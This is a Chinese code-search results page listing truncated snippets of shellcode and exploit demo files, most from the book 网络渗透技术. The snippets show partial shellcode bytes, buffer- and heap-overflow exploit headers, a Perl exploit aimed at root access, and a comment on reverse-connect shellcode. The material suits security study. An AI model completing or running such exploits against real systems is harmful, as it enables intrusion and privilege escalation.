代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/332113/3401459
c client_hook_recv.c
/* client_hook_recv.c - find socket demo
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* Hook系统的recv调用的shellcode演示
*/
#include
#include
#include
#pragma
www.eeworm.com/read/332113/3401437
c exp.c
/* exp.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对vul.c的利用程序
*/
#include
#define BUFSIZE 1024
#define RET 0xbfbff504
#define RET_OFF 43
char shellcode
www.eeworm.com/read/159132/10692226
c client_fun.c
/* client_fun.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 结合文件上传下载功能的shellcode演示
*/
#include
#include
#include
#pragma comment (lib,"ws2_32")
#in
www.eeworm.com/read/332113/3401451
c client_fun.c
/* client_fun.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 结合文件上传下载功能的shellcode演示
*/
#include
#include
#include
#pragma comment (lib,"ws2_32")
#in
www.eeworm.com/read/332113/3401502
c heapexp1.c
/* heapexp1.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* Win32堆溢出攻击模版1-精确定位shellcode
*/
#include
#include
#include
#pragma comment (lib,"ws2_32")
www.eeworm.com/read/247748/12621357
txt 关于 shell code 的编写.txt
关于 Shell Code 的编写
下面是一个创建Shell的C程序shellcode.c: (本文以IntelX86上的Linux为例说明)
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
我们先
www.eeworm.com/read/332113/3401499
c lookaside_test.c
/* lookaside_test.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* Win32堆溢出lookaside表利用演示
*/
#include
#include
char shellcode[]=
"\xeb\x10\x5b\x4b\x33\
www.eeworm.com/read/127204/14369809
cpp t.cpp
#include
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
//////用于反向回连的shellcode代码,这时你要先预先使用NC.EXE监听一个端口,然后等代他来连接你
char reverse_shell
www.eeworm.com/read/332113/3401440
pl ex.pl
#!/usr/bin/perl
# ex.pl
#
# 《网络渗透技术》演示程序
# 作者:san, alert7, eyas, watercloud
#
# 用于攻击bug.cpp,覆盖虚函数指针表来执行shellcode,从而获得root权限
#
%ENV={};
$SHELL="1\xc0PPP[YZ4\xd0\xcd\x80";
$SHELL.="j\x0bX\x99R
www.eeworm.com/read/332113/3401471
c test_3.c
char shellcode[] =
// decoder
"\x7d\xce\x72\x79" // xor. %r14, %r14, %r14
"\x40\x82\xff\xfd" // bnel .main
"\x7d\xe8\x02\xa6" // mflr %r15
"\x39\xef\x01\x01" // a